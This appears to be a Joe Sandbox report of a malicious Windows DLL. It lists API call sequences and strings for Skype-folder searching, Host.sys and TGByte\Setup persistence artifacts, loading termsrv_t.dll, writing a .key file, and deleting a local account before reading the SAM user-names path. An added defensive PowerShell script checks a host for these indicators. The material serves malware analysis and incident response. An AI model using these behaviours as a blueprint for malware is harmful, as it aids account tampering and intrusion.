                                                    • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                    • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                    • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • #800.MFC42 ref: 1000EFAD
                                                  • #800.MFC42 ref: 1000EFC1
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                  • String ID: C:\Users\$Skype.exe$\AppData\Roaming\Microsoft\Skype for Desktop
                                                  • API String ID: 1983172782-3499480952
                                                  APIs
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$#825$Object$CursorDestroyRelease
                                                  • String ID:
                                                  • API String ID: 719826280-0
                                                  APIs
                                                  • malloc.MSVCRT ref: 10007519
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 10007541
                                                  • free.MSVCRT ref: 1000759F
                                                  • GetFileAttributesA.KERNEL32(?), ref: 100075AD
                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 100075D4
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 100075E3
                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 100075F9
                                                  • ReadFile.KERNEL32(?,00000000,?,0000035D,00000000), ref: 1000761D
                                                  • CloseHandle.KERNEL32(?), ref: 1000762A
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 1000766A
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Virtual$AllocAttributesCloseCreateFolderFreeHandlePathReadSizeSpecialfreemalloc
                                                  • String ID: Main
                                                  • API String ID: 2820283417-521822810
                                                  APIs
                                                    • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                    • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                    • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                    • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001A98A
                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9C4
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9D4
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9E4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9EB
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001A9F8
                                                  • gethostname.WS2_32(?,?), ref: 1001AA00
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001AA07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrlen$#823$AddressCloseCreateHandleLibraryLoadProcReadSizegethostname
                                                  • String ID: C:\ProgramData\Microsoft Drive\Host.sys$Host$TGByte\Setup
                                                  • API String ID: 1105965372-3579490797
                                                  • Opcode ID: 26600dc6ced3552f7cb32c9401563bb8fc38f089117c6e8a29bd790fcd37870b
                                                  • Instruction ID: 1aca79b18ebe77987ab2057df5d6393e57785d9c54ea4be51680de8087f9014e
                                                  • Opcode Fuzzy Hash: 26600dc6ced3552f7cb32c9401563bb8fc38f089117c6e8a29bd790fcd37870b
                                                  • Instruction Fuzzy Hash: B331D675604754AFE320CB28CC90FEB7799FB89340F040929FA49A7290DA316945CF62
                                                  APIs
                                                  • wsprintfA.USER32 ref: 10026D35
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10026D4B
                                                  • lstrcatA.KERNEL32(?,?), ref: 10026D5E
                                                  • LocalAlloc.KERNEL32(00000040,00000400), ref: 10026D6B
                                                  • GetFileAttributesA.KERNEL32(?), ref: 10026D7B
                                                  • LoadLibraryA.KERNEL32(?), ref: 10026D8E
                                                  • lstrlenA.KERNEL32(?,?,?,75570F00), ref: 10026DA9
                                                  • lstrlenA.KERNEL32(?,?,75570F00), ref: 10026DC9
                                                  • LocalReAlloc.KERNEL32(00000000,00000003,00000042,?,75570F00), ref: 10026DD3
                                                  • LocalFree.KERNEL32(00000000,?,75570F00), ref: 10026DE7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$Alloclstrlen$AttributesDirectoryFileFreeLibraryLoadSystemlstrcatwsprintf
                                                  • String ID: \termsrv_t.dll
                                                  • API String ID: 2807520882-1337493607
                                                  • Opcode ID: 83a4be9771d83eee3d19b33fbd7ca9d9f5fde24c43fc361349bad1d2511fc240
                                                  • Instruction ID: a7eecf74c6d42d9f50bdf01c0ac0242f7398daee99183518acfba9189af43730
                                                  • Opcode Fuzzy Hash: 83a4be9771d83eee3d19b33fbd7ca9d9f5fde24c43fc361349bad1d2511fc240
                                                  • Instruction Fuzzy Hash: 6721D176100306AFD724DB60DC88EEB77A8FB85710F444A18FA4A97191EB70E509CB62
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: inet_ntoa$htons$inet_addr
                                                  • String ID:
                                                  • API String ID: 2325850693-0
                                                  • Opcode ID: feff4991006adee928c6db238b0ff46cf5f451b3ea962ecf4bc5810bc883adaf
                                                  • Instruction ID: 0f8a403a37a04198fb3543f642c4371480fab305af7d543d8c9d6285c61f0e9b
                                                  • Opcode Fuzzy Hash: feff4991006adee928c6db238b0ff46cf5f451b3ea962ecf4bc5810bc883adaf
                                                  • Instruction Fuzzy Hash: 6051493A7046544BCB18DF38B8901AFB7D1FF89260B9985AEFD8AD7341CA21ED01C764
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BA5E
                                                  • Process32First.KERNEL32(00000000,?), ref: 1000BA73
                                                  • GetLastError.KERNEL32(00000000,?), ref: 1000BA80
                                                  • _wcsupr.MSVCRT ref: 1000BA9D
                                                  • _wcsupr.MSVCRT ref: 1000BAA6
                                                  • wcsstr.MSVCRT ref: 1000BAAA
                                                  • Process32Next.KERNEL32(00000000,?), ref: 1000BACD
                                                  • _strlwr.MSVCRT ref: 1000BAE7
                                                  • _strlwr.MSVCRT ref: 1000BAEA
                                                  • strstr.MSVCRT ref: 1000BAF2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 1000BB01
                                                  • CloseHandle.KERNEL32(00000000,00000000,?), ref: 1000BB0B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$Next_strlwr_wcsupr$CloseCreateErrorFirstHandleLastSnapshotToolhelp32strstrwcsstr
                                                  • String ID:
                                                  • API String ID: 146143966-0
                                                  • Opcode ID: 479f2f72a704a3b5c2289d2de251190d7c82cc186dc092ac8778594daa37f946
                                                  • Instruction ID: 58f6ba2257750e6ab45c168541484ccfaec70cf465e469f9539c8ec9d4fa11c7
                                                  • Opcode Fuzzy Hash: 479f2f72a704a3b5c2289d2de251190d7c82cc186dc092ac8778594daa37f946
                                                  • Instruction Fuzzy Hash: 6D11B6762003156BF350EBB59C85EEB7B9CEFC1390F850929FD05C2145EB39E90886B1
                                                  APIs
                                                  • NetUserDel.NETAPI32(00000000,00000000), ref: 10025C48
                                                  • #825.MFC42(00000000,00000000,00000000), ref: 10025C50
                                                  • wsprintfA.USER32 ref: 10025C98
                                                  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 10025CB8
                                                  • Sleep.KERNEL32(00000032), ref: 10025CC4
                                                  • RegQueryValueExA.ADVAPI32 ref: 10025CF1
                                                  • RegCloseKey.ADVAPI32(1012B024), ref: 10025CFC
                                                  • wsprintfA.USER32 ref: 10025D11
                                                    • Part of subcall function 10025700: LocalSize.KERNEL32(00000000), ref: 10025710
                                                    • Part of subcall function 10025700: LocalFree.KERNEL32(00000000,?,10025C00,00000001,?,00000000,00000001,?,?), ref: 10025720
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Localwsprintf$#825CloseFreeOpenQuerySizeSleepUserValue
                                                  • String ID: %08X$SAM\SAM\Domains\Account\Users\Names\%s
                                                  • API String ID: 2119749478-1111274145
                                                  • Opcode ID: 8633236df80041a6d746a513e3dfe6e9c440722c7b8ff1fe9009a88f8ae055c0
                                                  • Instruction ID: 953d10763634fda03d780101f249e3d08da98c717480f8543807abe27b9f4de5
                                                  • Opcode Fuzzy Hash: 8633236df80041a6d746a513e3dfe6e9c440722c7b8ff1fe9009a88f8ae055c0
                                                  • Instruction Fuzzy Hash: 1A31E7752043056FE210DB24AC85FAB77D8EBC5255F80092DF94692282EA76E90C86A6
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B634
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000B6A9
                                                  • GetFileSize.KERNEL32 ref: 1000B6BC
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 1000B6D0
                                                  • lstrlenA.KERNEL32(?), ref: 1000B6DE
                                                  • #823.MFC42(00000000), ref: 1000B6E7
                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 1000B70D
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 1000B716
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000B71D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$lstrlen$#823CloseCreateDirectoryHandlePointerSizeSystemWrite
                                                  • String ID: .key
                                                  • API String ID: 2856261289-343438762
                                                  • Opcode ID: 3818ea17cc2e59f9f6ab64f97ab2d81d5e532922a39f58c257a4f2331ab7a23d
                                                  • Instruction ID: bd8e3325d0db8e7463eafbc11f0d66b84d6b493b70728e4679981c1757bf8fad
                                                  • Opcode Fuzzy Hash: 3818ea17cc2e59f9f6ab64f97ab2d81d5e532922a39f58c257a4f2331ab7a23d
                                                  • Instruction Fuzzy Hash: A0215C752006042BF724DA789C8AFAB3A89FB84760F580739FE57D71D1DEA49D088760
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutOpen), ref: 100014C9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100014D2
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutPrepareHeader), ref: 100014E2
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100014E5
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutGetNumDevs), ref: 100014F5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100014F8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: WINMM.dll$waveOutGetNumDevs$waveOutOpen$waveOutPrepareHeader
                                                  • API String ID: 2574300362-4065288365
                                                  • Opcode ID: c1eceda1addd48c4943001bcefb37505a5823e870f1f8cdf6cdf7baea139bf02
                                                  • Instruction ID: 97c40741ceac41b55f427a3e19617a04594bb35f0b993fe0b131869bec9d13a6
                                                  • Opcode Fuzzy Hash: c1eceda1addd48c4943001bcefb37505a5823e870f1f8cdf6cdf7baea139bf02
                                                  • Instruction Fuzzy Hash: C5212676600204ABDB10DF68EC84AA67BE8FFC8310F154469EB049B301D736E945DBE0
                                                  APIs
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000E5EA
                                                  • lstrlenA.KERNEL32 ref: 1000E609
                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 1000E612
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000E619
                                                  • RegCreateKeyA.ADVAPI32(80000001,TGByte\Setup,?), ref: 1000E62E
                                                  • RegSetValueExA.ADVAPI32(00000000,Host,00000000,00000001,?), ref: 1000E650
                                                  • RegCloseKey.ADVAPI32(?), ref: 1000E65B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateFile$HandleValueWritelstrlen
                                                  • String ID: C:\ProgramData\Microsoft Drive\Host.sys$Host$TGByte\Setup
                                                  • API String ID: 1763583472-3579490797
                                                  • Opcode ID: 3c72f0055c499f351d9c69bb76d358f610eb38518ca91f6f01103dca83156795
                                                  • Instruction ID: 77af767004de95c6ec99707751be97fa26c4c007db1504f7e5df3f5080d650d4
                                                  • Opcode Fuzzy Hash: 3c72f0055c499f351d9c69bb76d358f610eb38518ca91f6f01103dca83156795
                                                  • Instruction Fuzzy Hash: 9E11A375100310BBE320DB68CC49FEB7BADFB89751F044A18F659A21D0DBB4A8058BA2
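The function listings above pin down several host artifacts: the two routines sharing the strings C:\ProgramData\Microsoft Drive\Host.sys, Host and TGByte\Setup (one writes the file and the registry value under HKEY_CURRENT_USER, the other reads the file back and calls gethostname), the routine that builds <system directory>\termsrv_t.dll and loads it with LoadLibraryA, the routine that appends to a .key file in the system directory, and the NetUserDel routine that afterwards reads SAM\SAM\Domains\Account\Users\Names\%s. The PowerShell triage script below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It checks a host for those artifacts. Everything not taken from the listings is an assumption and marked as such in the code: the function name Get-ZfJheGhddqArtifacts, the choice to check the TGByte\Setup key under every loaded hive in HKEY_USERS (the sandbox only shows the current user's hive), flagging every *.key file in the system directories because the base name is not recoverable from the listing, checking both System32 and SysWOW64 because the sample is a 32-bit DLL subject to file system redirection, and the 30-day Security-log search for event ID 4726 (a user account was deleted) as the standard trace of a NetUserDel call.

```powershell
# Added triage script for the artifacts named in this report (not the sample's code and
# not Joe Sandbox output). Run in an elevated PowerShell session on the suspect host.
# A result with no findings only means these specific artifacts were not present.

function Get-ZfJheGhddqArtifacts {
    [CmdletBinding()]
    param(
        # Days of Security log to scan for local-account deletions (assumption: 30).
        [int]$DaysBack = 30
    )

    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding([string]$Kind, [string]$Detail) {
        $findings.Add([pscustomobject]@{ Kind = $Kind; Detail = $Detail })
    }

    # 1. Data file written at 1000E5EA (CreateFileA, GENERIC_WRITE) and read back at 1001A9C4.
    $hostFile = 'C:\ProgramData\Microsoft Drive\Host.sys'
    if (Test-Path -LiteralPath $hostFile) {
        $item = Get-Item -LiteralPath $hostFile -Force
        Add-Finding 'File' ("{0} ({1} bytes, modified {2:u})" -f $hostFile, $item.Length, $item.LastWriteTime)
    }

    # 2. RegCreateKeyA(0x80000001 = HKEY_CURRENT_USER, "TGByte\Setup") + RegSetValueExA("Host").
    #    The key sits directly under the user hive, not under ...\Software. Assumption: the
    #    value may exist for any user, so every loaded hive under HKEY_USERS is checked.
    foreach ($hive in Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue) {
        $keyPath = "Registry::HKEY_USERS\$($hive.PSChildName)\TGByte\Setup"
        if (Test-Path -LiteralPath $keyPath) {
            $props = Get-ItemProperty -LiteralPath $keyPath -ErrorAction SilentlyContinue
            $hostValue = if ($props -and $props.PSObject.Properties['Host']) { $props.Host } else { '<no Host value>' }
            Add-Finding 'Registry' ("{0}\Host = {1}" -f $keyPath, $hostValue)
        }
    }

    # 3. GetSystemDirectoryA + lstrcatA("\termsrv_t.dll") + LoadLibraryA at 10026D4B-10026D8E.
    #    The sample is a 32-bit DLL, so on 64-bit Windows GetSystemDirectoryA is redirected
    #    to SysWOW64; both directories are checked.
    $sysDirs = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64") | Where-Object { Test-Path -LiteralPath $_ }
    foreach ($dir in $sysDirs) {
        $dll = Join-Path $dir 'termsrv_t.dll'
        if (Test-Path -LiteralPath $dll) {
            $sig = Get-AuthenticodeSignature -FilePath $dll
            Add-Finding 'File' ("{0} (signature: {1})" -f $dll, $sig.Status)
        }

        # 4. The routine at 1000B634 appends to "<name>.key" in the system directory
        #    (OPEN_ALWAYS, SetFilePointer FILE_END, WriteFile). The base name is not in the
        #    listing, so (assumption) every *.key there is flagged for manual review.
        foreach ($key in Get-ChildItem -LiteralPath $dir -Filter '*.key' -File -Force -ErrorAction SilentlyContinue) {
            Add-Finding 'File (review)' ("{0} ({1} bytes, modified {2:u})" -f $key.FullName, $key.Length, $key.LastWriteTime)
        }
    }

    # 5. NetUserDel at 10025C48 followed by a read of SAM\SAM\Domains\Account\Users\Names\%s
    #    means a local account was removed. Assumption: Security event ID 4726 ("A user
    #    account was deleted") within the last $DaysBack days is the trace worth pulling.
    $filter = @{ LogName = 'Security'; Id = 4726; StartTime = (Get-Date).AddDays(-$DaysBack) }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($ev in $events) {
        $x = [xml]$ev.ToXml()
        $target  = ($x.Event.EventData.Data | Where-Object Name -eq 'TargetUserName').'#text'
        $subject = ($x.Event.EventData.Data | Where-Object Name -eq 'SubjectUserName').'#text'
        Add-Finding 'Event 4726' ("{0:u} account '{1}' deleted by '{2}'" -f $ev.TimeCreated, $target, $subject)
    }

    return $findings
}

Get-ZfJheGhddqArtifacts | Format-Table -AutoSize
```

The registry check deliberately uses the literal HKEY_USERS path rather than the HKCU: drive because the sample wrote the key directly under the hive root; a hunt that only looks under HKCU\Software would miss it. The termsrv_t.dll hit is reported with its Authenticode status because the sandbox shows the sample loading the file by that name but does not show who wrote it; an unsigned DLL at that path in either system directory should be pulled for analysis rather than assumed to be the payload.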
                                                  APIs
                                                  • select.WS2_32(?,?,00000000,00000000,00000000), ref: 10023D9A
                                                  • _errno.MSVCRT ref: 10023DA4
                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 10023DBC
                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 10023DD2
                                                  • recvfrom.WS2_32(00000010,?,00001FF6,00000000,?,00000010), ref: 10023E0C
                                                  • inet_addr.WS2_32(00000000), ref: 10023E8D
                                                  • htons.WS2_32(?), ref: 10023E9C
                                                  • Sleep.KERNEL32(00000005), ref: 10023ECC
                                                  • Sleep.KERNEL32(00000005,?,?), ref: 10023F37
                                                  • closesocket.WS2_32 ref: 10023F4C
                                                  • closesocket.WS2_32(?), ref: 10023F52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
